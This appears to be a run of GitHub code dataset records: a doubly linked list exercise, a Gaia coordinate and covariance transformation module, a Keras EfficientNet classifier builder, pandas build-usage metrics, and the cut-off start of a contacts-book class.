4\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\n\t\t\tcur=cur.next\n\n\n\n\n\n\n\n\nmy_list=Doubly()\nmy_list.append(1)\nmy_list.append(2)\nmy_list.append(3)\nmy_list.append(4)\n\n\nmy_list.prepend(0)\nmy_list.add_after(5,3)\n# my_list.delete(0)\n# my_list.display()\n# print(my_list.pairs_with_sum(0))\n# my_list.remove_duplicates()\nmy_list.display()\n","repo_name":"tichi97/code_practice","sub_path":"doublylists.py","file_name":"doublylists.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31648300605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 09:46:35 2018\n\n@author: David Hobbs, Lund Observatory\nv 0.1 author Paul McMillan\n\"\"\"\nimport numpy as np\n\nmas2deg = 1.0/(3600*1000)\ndeg2rad = np.pi/180.0\nmas2rad = mas2deg * deg2rad\n\nAprime = np.asarray([[-0.0548755604162154, -0.8734370902348850, -0.4838350155487132],\n [+0.4941094278755837, -0.4448296299600112, +0.7469822444972189],\n [-0.8676661490190047, -0.1980763734312015, +0.4559837761750669]])\n\n\ndef transformGalToIcrs( GalCoords, GalUncerts, GalC = None) :\n '''Transforms coordinates and uncertainties (/covariance matrix) from Galactic coordinates to Equatorial (ICRS) coordinates\n\n This code impliments Gaia Data Release 2, Documentation v1.1,\n Section 3.1.7: Transformations of astrometric data and error propagation (Alexey Butkevich, Lennart Lindegren,\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/chap_cu3ast/sec_cu3ast_intro/ssec_cu3ast_intro_tansforms.html)\n Code written by David Hobbs & Paul McMillan\n\n Parameters:\n ------------\n\n GalCoords: Array of dimensions (N,5), with N number of coords\n (l, b, parallax, pm_lStar, pm_b). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n Must be in an array of dimensions (N,5) where N is number of coords\n\n GalUncerts: Array of dimensions (N,5), with N number of coords\n (l_error, b_error, parallax_error, pm_lStar_error, pm_b_error). Units mas or mas/yr\n Must be in an array of dimensions (N,5) where N is number of coords\n\n GalC [optional]: Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in galactic coordinates.\n Writing the Errors_in array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Returns:\n -----------\n\n EqCoords: Array of dimensions (N,5), with N number of coords\n (ra, dec, parallax, pm_raStar, pm_dec). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n\n EqUncerts: Array of dimensions (N,5), with N number of coords\n (ra_error, dec_error, parallax_error, pm_raStar_error, pm_dec_error). Units mas or mas/yr.\n\n EqC : Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in Galactic coordinates.\n Writing the Errors_in array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Notes:\n ------------\n If GalC is provided, EqErrors is ignored (as redundant)\n\n If GalC is not provided, correlation coefficients are assumed to be zero\n\n '''\n\n # Number of terms\n nterms = GalCoords.shape[0]\n\n CoordConverter = np.array([deg2rad,deg2rad,mas2rad,mas2rad,mas2rad])\n lbCoords = GalCoords * CoordConverter\n\n lbUncerts = GalUncerts*mas2rad\n if GalC is None :\n Cgal = np.zeros([nterms,5,5])\n row,col = np.diag_indices(5)\n Cgal[:,row,col] = lbUncerts**2\n else :\n Cgal = GalC*mas2rad*mas2rad\n l = lbCoords[:,0]\n b = lbCoords[:,1]\n # Construct rGal\n rGal = np.transpose(np.asarray([np.cos(l)*np.cos(b),\n np.sin(l)*np.cos(b),\n np.sin(b)]))\n # Construct rIcrs\n rIcrs = np.einsum('ij,kj->ki',np.transpose(Aprime),rGal)\n\n alpha = np.arctan2(rIcrs[:,1], rIcrs[:,0])\n delta = np.arctan2(rIcrs[:,2], np.sqrt(rIcrs[:,0]**2 + rIcrs[:,1]**2))\n\n # The transformation of the proper motion components\n pIcrs = np.asarray([-np.sin(alpha),\n np.cos(alpha),\n np.zeros_like(alpha)])\n qIcrs = np.asarray([-np.cos(alpha)*np.sin(delta),\n -np.sin(alpha)*np.sin(delta),\n np.cos(delta)])\n\n pGal = np.asarray([-np.sin(l),\n np.cos(l),\n np.zeros_like(l)])\n qGal = np.asarray([-np.cos(l)*np.sin(b),\n -np.sin(l)*np.sin(b),\n np.cos(b)])\n mulStar = lbCoords[:,3]\n mub = lbCoords[:,4]\n muGal = pGal*mulStar + qGal*mub\n muIcrs = np.einsum('ij,jk ->ik',np.transpose(Aprime),muGal)\n\n # Icrs proper motions\n muAlphaStar = np.sum(pIcrs*muIcrs,axis=0)\n muDelta = np.sum(qIcrs*muIcrs,axis=0)\n\n gal = (np.hstack((pGal.T, qGal.T))).reshape(nterms,2,3)\n icrs = (np.hstack((pIcrs.T, qIcrs.T))).reshape(nterms,2,3)\n\n tmp = np.einsum('ij,klj->kil',Aprime,icrs)\n galT = np.einsum('ijk->ikj', gal)\n G = np.einsum('ijk,ikl->ijl', gal,tmp)\n # Jacobian\n\n Arr0 = np.zeros(nterms)\n Arr1 = np.ones(nterms)\n J = np.asarray([[G[:,0,0], G[:,0,1], Arr0, Arr0, Arr0],\n [G[:,1,0], G[:,1,1], Arr0, Arr0, Arr0],\n [ Arr0, Arr0, Arr1, Arr0, Arr0],\n [ Arr0, Arr0, Arr0, G[:,0,0], G[:,0,1]],\n [ Arr0, Arr0, Arr0, G[:,1,0], G[:,1,1]]])\n J = np.einsum('ijk->kij',J)\n JT = np.einsum('ijk->ikj',J)\n\n tmp = np.einsum('ijk,ikl->ijl',JT,Cgal)\n EqC = np.matmul(np.matmul(JT,Cgal),J)\n EqCoords = np.atleast_2d(np.asarray((alpha,delta,lbCoords[:,2],muAlphaStar,muDelta))).T/CoordConverter\n EqUncerts = np.atleast_2d(np.sqrt(np.diagonal(EqC,axis1=1,axis2=2)))/mas2rad\n EqC = EqC/mas2rad**2\n return EqCoords, EqUncerts, EqC\n\n\ndef transformIcrsToGal( EqCoords, EqUncerts, EqC = None) :\n '''Transforms coordinates and uncertainties (/covariance matrix) from Equatorial (ICRS) coordinates to Galactic coordinates\n\n This code impliments Gaia Data Release 2, Documentation v1.1,\n Section 3.1.7: Transformations of astrometric data and error propagation (Alexey Butkevich, Lennart Lindegren,\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/chap_cu3ast/sec_cu3ast_intro/ssec_cu3ast_intro_tansforms.html)\n Code written by David Hobbs & Paul McMillan\n\n Parameters:\n ------------\n\n EqCoords: Array of dimensions (N,5), with N number of coords\n (ra, dec, parallax, pm_raStar, pm_dec). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n Must be in an array of dimensions (N,5) where N is number of coords\n\n EqUncerts: Array of dimensions (N,5), with N number of coords\n (ra_error, dec_error, parallax_error, pm_raStar_error, pm_dec_error). Units mas or mas/yr\n Must be in an array of dimensions (N,5) where N is number of coords\n\n EqC [optional]: Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in equatorial coordinates.\n Writing an individual objects EqUncerts array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Returns:\n -----------\n\n GalCoords: Array of dimensions (N,5), with N number of coords\n (l, b, parallax, pm_lStar, pm_b). Units (respectively) deg, deg, mas, mas/yr, mas/yr.\n\n GalUncerts: Array of dimensions (N,5), with N number of coords\n (l_error, b_error, parallax_error, pm_lStar_error, pm_b_error). Units mas or mas/yr.\n\n GalC : Array of dimensions (N,5,5), with N number of coords\n Covariance Matrix describing uncertainties in Galactic coordinates.\n Writing the GalUncerts array (above) as sigma_i, this matrix, C, has diagonal elements\n C_ii = sigma_i**2,\n and off-diagonal elements\n C_ij = rho_ij sigma_i sigma_j,\n with rho_ij the correlation coefficients\n\n Notes:\n ------------\n If EqC is provided, EqUncerts is ignored (as redundant)\n\n If EqC is not provided, correlation coefficients are assumed to be zero\n\n '''\n # Number of terms\n nterms = EqCoords.shape[0]\n\n # Unit conversion - rename things to IcrsXXX to avoid confusion\n CoordConverter = np.array([deg2rad,deg2rad,mas2rad,mas2rad,mas2rad])\n IcrsCoord = EqCoords * CoordConverter\n IcrsUncerts = EqUncerts*mas2rad\n\n # If no covariance matrix is provided, correlation coefficients are assumed to be 0,\n # and covariances taken for quoted uncertainties\n if EqC is None :\n C = np.zeros([nterms,5,5])\n row,col = np.diag_indices(5)\n C[:,row,col] = IcrsUncerts**2\n else :\n C = EqC*mas2rad*mas2rad\n\n alpha = IcrsCoord[:,0] #(IcrsCoord[:,0]).reshape(nterms)\n delta = IcrsCoord[:,1] #.reshape(nterms)\n\n # Construct rIcrs\n rIcrs = np.transpose(np.asarray([np.cos(alpha)*np.cos(delta),\n np.sin(alpha)*np.cos(delta),\n np.sin(delta)]))\n\n # Construct rGal\n rGal = np.einsum('ij,kj->ki',Aprime,rIcrs)\n\n l = np.arctan2(rGal[:,1], rGal[:,0])\n b = np.arctan2(rGal[:,2], np.sqrt(rGal[:,0]**2 + rGal[:,1]**2))\n\n # The transformation of the proper motion components, eq 3.64, 3.65\n pGal = np.asarray([-np.sin(l),\n np.cos(l),\n np.zeros_like(l)])\n qGal = np.asarray([-np.cos(l)*np.sin(b),\n -np.sin(l)*np.sin(b),\n np.cos(b)])\n pIcrs = np.asarray([-np.sin(alpha),\n np.cos(alpha),\n np.zeros_like(alpha)])\n qIcrs = np.asarray([-np.cos(alpha)*np.sin(delta),\n -np.sin(alpha)*np.sin(delta),\n np.cos(delta)])\n\n muAlphaStar = IcrsCoord[:,3]\n muDelta = IcrsCoord[:,4]\n # eq 3.66, 3.67\n muIcrs = pIcrs*muAlphaStar + qIcrs*muDelta\n muGal = np.einsum('ij,jk ->ik',Aprime,muIcrs)\n\n # Galactic proper motions, eq 3.70\n mulStar = np.sum(pGal*muGal,axis=0)\n mub = np.sum(qGal*muGal,axis=0)\n\n # eq 3.80\n gal = (np.hstack((pGal.T, qGal.T))).reshape(nterms,2,3)\n icrs = (np.hstack((pIcrs.T, qIcrs.T))).reshape(nterms,2,3)\n\n tmp = np.einsum('ij,klj->kil',Aprime,icrs)\n G = np.einsum('ijk,ikl->ijl', gal,tmp)\n\n # Jacobian, eq 3.77, 3.79\n Arr0 = np.zeros(nterms)\n Arr1 = np.ones(nterms)\n J = np.asarray([[G[:,0,0], G[:,0,1], Arr0, Arr0, Arr0],\n [G[:,1,0], G[:,1,1], Arr0, Arr0, Arr0],\n [ Arr0, Arr0, Arr1, Arr0, Arr0],\n [ Arr0, Arr0, Arr0, G[:,0,0], G[:,0,1]],\n [ Arr0, Arr0, Arr0, G[:,1,0], G[:,1,1]]])\n # rearrange terms\n J = np.einsum('ijk->kij',J)\n JT = np.einsum('ijk->ikj',J)\n\n GalC = np.matmul(np.matmul(J,C),JT)\n #print(np.einsum('ijk,ikl->ijl',J,JT))\n GalCoords = np.atleast_2d(np.asarray((l,b,IcrsCoord[:,2],mulStar,mub))).T/CoordConverter\n GalUncerts = np.atleast_2d(np.sqrt(np.diagonal(GalC,axis1=1,axis2=2)))/mas2rad\n GalC = GalC/mas2rad**2\n return GalCoords, GalUncerts, GalC\n\n\ndef CreateCovarianceMatrix_ra_dec (ra_error, dec_error, parallax_error, pmra_error, pmdec_error,\n radecCorr=0, raparallaxCorr=0, rapmraCorr=0, rapmdecCorr=0,\n decparallaxCorr=0, decpmraCorr=0, decpmdecCorr=0,\n parallaxpmraCorr=0, parallaxpmdecCorr=0,\n pmrapmdecCorr=0) :\n '''Create a covarience matrix from input uncertainties and correlations in ICRS coordinates\n\n Parameters:\n ------------\n\n ra_error, dec_error, parallax_error, pmra_error, pmdec_error :\n Each must be an array of values (all of the same length, N)\n\n XXXCorr: corellations between parameters.\n Must be either an array of length N or a value.\n If not given, assumed to be zero.\n\n Returns:\n ---------\n\n C: Covariance matrix. Format numpy array of dimensions (nterms,5,5)\n\n '''\n nterms = len(ra_error)\n\n for err in [dec_error, parallax_error, pmra_error, pmdec_error] :\n assert (len(err) == nterms), 'error terms must have the same length'\n\n FirstPart = [0,0,0,0,1,1,1,2,2,3]\n SecondPart = [1,2,3,4,2,3,4,3,4,4]\n Correlations = [radecCorr, raparallaxCorr, rapmraCorr, rapmdecCorr,\n decparallaxCorr, decpmraCorr, decpmdecCorr,\n parallaxpmraCorr, parallaxpmdecCorr,\n pmrapmdecCorr]\n\n\n C = np.zeros([nterms,5,5])\n C[:,0,0] = ra_error**2\n C[:,1,1] = dec_error**2\n C[:,2,2] = parallax_error**2\n C[:,3,3] = pmra_error**2\n C[:,4,4] = pmdec_error**2\n\n for a,b,Corr in zip(FirstPart, SecondPart, Correlations) :\n C[:,a,b] = C[:,b,a] = np.sqrt(C[:,a,a]*C[:,b,b])*Corr\n return C\n\n\ndef CreateCovarianceMatrix_l_b (l_error, b_error, varpi_error, pmlStar_error, pmb_error,\n lbCorr=0, lvarpiCorr=0, lpmlStarCorr=0, lpmbCorr=0,\n bvarpiCorr=0, bpmlStarCorr=0, bpmbCorr=0,\n varpipmlStarCorr=0, varpipmbCorr=0,\n pmlStarpmbCorr=0) :\n '''Create a covarience matrix from input uncertainties and correlations in Galactic coordinates\n\n Parameters:\n ------------\n\n l_error, b_error, varpi_error, pmlStar_error, pmb_error :\n Each must be an array of values (all of the same length, N)\n\n XXXCorr: corellations between parameters.\n Must be either an array of length N or a value.\n If not given, assumed to be zero.\n\n Returns:\n ---------\n\n C: Covariance matrix. Format numpy array of dimensions (nterms,5,5)\n '''\n nterms = len(l_error)\n\n for err in [ b_error, varpi_error, pmlStar_error, pmb_error] :\n assert (len(err) == nterms), 'error terms must have the same length'\n\n FirstPart = [0,0,0,0,1,1,1,2,2,3]\n SecondPart = [1,2,3,4,2,3,4,3,4,4]\n Correlations = [lbCorr, lvarpiCorr, lpmlStarCorr, lpmbCorr,\n bvarpiCorr, bpmlStarCorr, bpmbCorr,\n varpipmlStarCorr, varpipmbCorr,\n pmlStarpmbCorr]\n\n C = np.zeros([nterms,5,5])\n C[:,0,0] = l_error**2\n C[:,1,1] = b_error**2\n C[:,2,2] = varpi_error**2\n C[:,3,3] = pmlStar_error**2\n C[:,4,4] = pmb_error**2\n\n for a,b,Corr in zip(FirstPart, SecondPart, Correlations) :\n C[:,a,b] = C[:,b,a] = np.sqrt(C[:,a,a]*C[:,b,b])*Corr\n return C\n\n\ndef testConversions() :\n # test values\n ra = np.asarray([9.1185, 30.00379737])\n dec = np.asarray([+01.08901332, -19.49883745])\n parallax = np.asarray([3.54, 21.90])\n pmra = np.asarray([-5.20, 181.21])\n pmdec = np.asarray([-1.88, -0.93])\n\n l,b,pmlStar,pmb = ra,dec,pmra,pmdec\n ##\n ra_error = np.asarray([1.32, 1.28])\n dec_error = np.asarray([0.74, 0.70])\n parallax_error = np.asarray([1.39, 3.10])\n pmra_error = np.asarray([1.36, 1.74])\n pmdec_error = np.asarray([0.81, 0.92])\n\n l_error,b_error,pmlStar_error,pmb_error = ra_error,dec_error,pmra_error,pmdec_error\n #\n icrsCoords = np.vstack((ra,dec,parallax,pmra,pmdec)).T\n icrsErrors = np.vstack((ra_error,dec_error,parallax_error,pmra_error,pmdec_error)).T\n\n # Obviously these are also valid coords, though not the same\n GalCoords = np.vstack((l,b,parallax,pmlStar,pmb)).T\n GalErrors = np.vstack((l_error,b_error,parallax_error,pmlStar_error,pmb_error)).T\n\n icrsCov = CreateCovarianceMatrix_ra_dec(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n tol = 1e-10\n # Test 1 - Icrs to Gal: conversion w.o. covarience matrix\n GC = transformIcrsToGal(icrsCoords,icrsErrors)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 1 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 1 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 1 - Cov')\n else : print('Passed test 1')\n\n # Test 2 - Icrs to Gal: conversion w. covarience matrix\n GC = transformIcrsToGal(icrsCoords,icrsErrors,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 2 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 2 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 2 - Cov')\n else : print('Passed test 2')\n\n # Test 3 - Icrs to Gal: conversion w.o. uncertainties (cov only)\n GC = transformIcrsToGal(icrsCoords,0,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 3 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 3 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 3 - Cov')\n else : print('Passed test 3')\n\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n\n # Test 4 - Gal to Icrs: conversion w.o. covarience matrix\n Icrs = transformGalToIcrs(GalCoords,GalErrors)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 4 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 4 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 4 - Cov')\n else : print('Passed test 4')\n\n # Test 5 - Gal to Icrs: conversion w. covarience matrix\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n Icrs = transformGalToIcrs(GalCoords,GalErrors,GalCov)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 5 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 5 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 5 - Cov')\n else : print('Passed test 5')\n\n # Test 6 - Gal to Icrs: conversion w. covarience matrix\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n Icrs = transformGalToIcrs(GalCoords,GalErrors)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 6 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 6 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 6 - Cov')\n else : print('Passed test 6')\n\n # Test 7 & 8: test with non-zero covariances\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error,\n lbCorr=0.7,pmlStarpmbCorr=np.array([-0.2,0.6]))\n\n Icrs = transformGalToIcrs(GalCoords,GalErrors,GalCov)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 7 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 7 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 7 - Cov')\n else : print('Passed test 7')\n\n icrsCov = CreateCovarianceMatrix_ra_dec(ra_error,dec_error,parallax_error,pmra_error,pmdec_error,\n decparallaxCorr=np.array([0.3,0.7]), pmrapmdecCorr=-0.4)\n\n GC = transformIcrsToGal(icrsCoords,icrsErrors,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 8 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 8 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 8 - Cov')\n else : print('Passed test 8')\n\n#testConversions()\n","repo_name":"Johngn/gaia","sub_path":"coordTransform.py","file_name":"coordTransform.py","file_ext":"py","file_size_in_byte":19742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25151447404","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow.keras.layers as layers\ndef get_my_EFFmodel(img_height, img_width, class_nums, checkpoint = None):\n # load the EFF_model\n\n EFF_model = tf.keras.applications.EfficientNetB4(\n include_top=False, weights='imagenet', input_tensor=None,\n input_shape=(img_height, img_width, 3), pooling=None,\n classifier_activation=None,\n )\n\n data_augmentation = keras.Sequential(\n [\n layers.experimental.preprocessing.RandomFlip(\"horizontal\", input_shape=(img_height, img_width, 3)),\n layers.experimental.preprocessing.RandomRotation(0.3),\n layers.experimental.preprocessing.RandomZoom(0.1)\n ]\n )\n\n # classifier\n classifier = keras.Sequential([\n layers.Dropout(0.2),\n layers.Dense(class_nums, activation='softmax')]\n )\n\n # normalization\n norm_layer = keras.layers.experimental.preprocessing.Rescaling(1. / 255, input_shape=(img_height, img_width, 3))\n\n # create my own model and compile\n inputs = keras.Input(shape=(img_width, img_height, 3))\n\n x = data_augmentation(inputs)\n x = norm_layer(x)\n x = EFF_model(x, training=True)\n x = keras.layers.GlobalAveragePooling2D()(x)\n\n outputs = classifier(x)\n model = keras.Model(inputs, outputs)\n if checkpoint is not None:\n model.load_weights(checkpoint)\n model.trainable = True\n\n return model\n","repo_name":"Mars-Wei/JNPL","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43313735683","text":"\"\"\"\nFunctions for calculating metrics based on the build data.\n\"\"\"\nimport pandas\n\nimport numpy as np\n\nfrom typing import Any, Dict, List, Set, Tuple\nfrom datetime import datetime, timedelta\n\n\ndef summarise(summary: Dict[str, Any]) -> str:\n \"\"\"\n Return a human-readable text summary of the provided values.\n \"\"\"\n out = [\"Summary\"]\n out += [\"=======\\n\"]\n out += [f\"Period: {summary['start']} - {summary['end']}\\n\"]\n\n out += [f\"- Total builds: {summary['n builds']}\"]\n out += [f\"- Number of users: {summary['n users']}\"]\n\n out += [f\"- Builds with packages: {summary['n builds with packages']}\"]\n\n out += [f\"- Builds with filesystem customizations: {summary['n builds with fs customizations']}\"]\n\n out += [f\"- Builds with custom repos: {summary['n builds with custom repos']}\"]\n return \"\\n\".join(out)\n\n\ndef summarize(summary: Dict[str, Any]) -> str:\n \"\"\"\n Alias for summarise().\n \"\"\"\n return summarise(summary)\n\n\ndef make_summary(builds: pandas.DataFrame) -> Dict[str, Any]:\n \"\"\"\n Return a dictionary that summarises the data in builds.\n The dictionary can be consumed by summarise() to create a human-readable text summary of the data.\n \"\"\"\n summary = {\n \"start\": builds[\"created_at\"].min(),\n \"end\": builds[\"created_at\"].max(),\n \"n builds\": builds.shape[0],\n \"n users\": builds[\"org_id\"].nunique(),\n \"n builds with packages\": builds[\"packages\"].apply(bool).sum(),\n \"n builds with fs customizations\": builds[\"filesystem\"].apply(bool).sum(),\n \"n builds with custom repos\": builds[\"payload_repositories\"].apply(bool).sum(),\n }\n\n return summary\n\n\ndef monthly_value(builds: pandas.DataFrame, column: str) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique values for the given column that appear in the data for each calendar month within the\n date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n month_offset = pandas.DateOffset(months=1)\n\n t_start = builds[\"created_at\"].min()\n m_start = pandas.Timestamp(year=t_start.year, month=t_start.month, day=1) # start of month of first data point\n\n t_end = builds[\"created_at\"].max()\n # start of month following last data point\n m_end = pandas.Timestamp(year=t_end.year, month=t_end.month, day=1) + pandas.DateOffset(months=1)\n\n month_starts = []\n n_values = []\n m_current = m_start\n while m_current < m_end:\n idxs = (builds[\"created_at\"] >= m_current) & (builds[\"created_at\"] < m_current+month_offset)\n n_values.append(builds[column].loc[idxs].nunique())\n month_starts.append(m_current)\n m_current += month_offset\n\n return np.array(n_values), np.array(month_starts)\n\n\ndef monthly_users(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique users that appear in the data for each calendar month within the date ranges found in\n the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n return monthly_value(builds, \"org_id\")\n\n\ndef monthly_builds(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of builds in the data for each calendar month within the date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n return monthly_value(builds, \"job_id\")\n\n\ndef monthly_new_users(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of new users that appear each calendar month within the date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n # get the first build date for each org_id, then calculate monthly_users from that data only\n first_builds: List[Dict[str, Any]] = []\n for org_id in builds[\"org_id\"].unique():\n org_builds = builds.loc[builds[\"org_id\"] == org_id]\n first_date = org_builds[\"created_at\"].min()\n first_builds.append({\"org_id\": org_id, \"created_at\": first_date})\n\n df = pandas.DataFrame.from_dict(first_builds)\n return monthly_users(df)\n\n\ndef value_sliding_window(builds: pandas.DataFrame, column: str, window: int) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique values for the given column that appear in the data within a sliding window of a given\n width (in days).\n The second return value is an array of the end dates for each window corresponding to each element in the first\n value.\n \"\"\"\n window = pandas.Timedelta(days=window)\n t_start = builds[\"created_at\"].min()\n t_end = builds[\"created_at\"].max()\n step = pandas.Timedelta(days=1) # slide the window 1 day each time\n\n end_dates = []\n n_values = []\n t_current = t_start + window # start with a full window\n while t_current < t_end:\n idxs = (builds[\"created_at\"] >= t_current-window) & (builds[\"created_at\"] < t_current)\n n_values.append(builds[column].loc[idxs].nunique())\n end_dates.append(t_current)\n t_current += step\n\n return np.array(n_values), np.array(end_dates)\n\n\ndef builds_over_time(builds: pandas.DataFrame, period: timedelta) -> Tuple[np.ndarray, np.ndarray]:\n t_start = builds[\"created_at\"].min()\n t_end = builds[\"created_at\"].max()\n bin_starts = []\n n_builds = []\n while t_start+period < t_end:\n idxs = (builds[\"created_at\"] >= t_start) & (builds[\"created_at\"] < t_start+period)\n n_builds.append(sum(idxs))\n bin_starts.append(t_start)\n t_start += period\n\n return np.array(bin_starts), np.array(n_builds)\n\n\ndef repeat_orgs(builds: pandas.DataFrame, min_builds: int, period: timedelta) -> Set[str]:\n \"\"\"\n Return a list of org_ids that have built at least 'min_builds' in a period of 'period'.\n \"\"\"\n orgs = builds[\"org_id\"].unique()\n\n active_orgs = set()\n\n pd_period = pandas.Timedelta(period) # convert for compatibility with numpy types\n\n for org in orgs:\n org_build_idxs = builds[\"org_id\"] == org\n org_build_dates = builds[\"created_at\"].loc[org_build_idxs]\n periods = np.diff(org_build_dates.sort_values())\n\n # if a sum of min_builds-1 periods is less than period, then the org is identified as a repeat/active org\n for p_idx, _ in enumerate(periods):\n p_sum = np.sum(periods[p_idx:p_idx+min_builds-1])\n\n if p_sum < pd_period:\n active_orgs.add(org)\n\n return active_orgs\n\n\ndef org_build_days(builds: pandas.DataFrame) -> pandas.DataFrame:\n \"\"\"\n Org IDs associated with the dates where they had at least one build.\n \"\"\"\n build_days: List[Dict[str, Any]] = []\n for org_id in builds[\"org_id\"].unique():\n org_builds = builds.loc[builds[\"org_id\"] == org_id]\n dates = np.unique(org_builds[\"created_at\"].values.astype(\"datetime64[D]\")) # round to day\n build_days.append({\"org_id\": org_id, \"build_dates\": dates})\n\n return pandas.DataFrame.from_dict(build_days)\n\n\ndef active_orgs(builds: pandas.DataFrame, min_days: int, recent_limit: int) -> pandas.Series:\n \"\"\"\n Returns a Series of org_ids for orgs that have builds on at least min_days separate days and the most recent one was\n after recent_limit days ago.\n \"\"\"\n build_days = org_build_days(builds)\n counts = build_days[\"build_dates\"].apply(len)\n build_days = build_days.loc[counts >= min_days]\n cutoff = datetime.now() - timedelta(days=recent_limit)\n most_recent_dates = build_days[\"build_dates\"].apply(max)\n recent_idxs = most_recent_dates > cutoff\n recent_orgs = build_days[\"org_id\"].loc[recent_idxs]\n return recent_orgs\n","repo_name":"larskarlitski/metrics","sub_path":"ibmetrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11863549493","text":"import csv\n\nclass Contact:\n first_name = \"\"\n last_name = \"\"\n company_name = \"\"\n address = \"\"\n city = \"\"\n county = \"\"\n state = \"\"\n zip = \"\"\n cell_phone = \"\"\n home_phone = \"\"\n email = \"\"\n\n\nclass ContactsBook:\n __contacts = []\n __file_path = \"\"\n\n def __init__(self, file_name):\n self.__read_contacts_from_file(file_name)\n\n\n def show_contacts(self):\n for c in self.__contacts:\n print(c.first_name + \" - \" + c.last_name + \"-\" + c.address + \" - \" + c.cell_phone)\n\n def add_contact(self, contact):\n self.__contacts.append(contact)\n\n def remove_contact(self, contact):\n self.__contacts.remove(contact)\n\n def find_contact_by_name(self, first_name, last_name):\n for c in self.__contacts:\n if first_name != \"\" and last_name != \"\" and c.first_name == first_name and 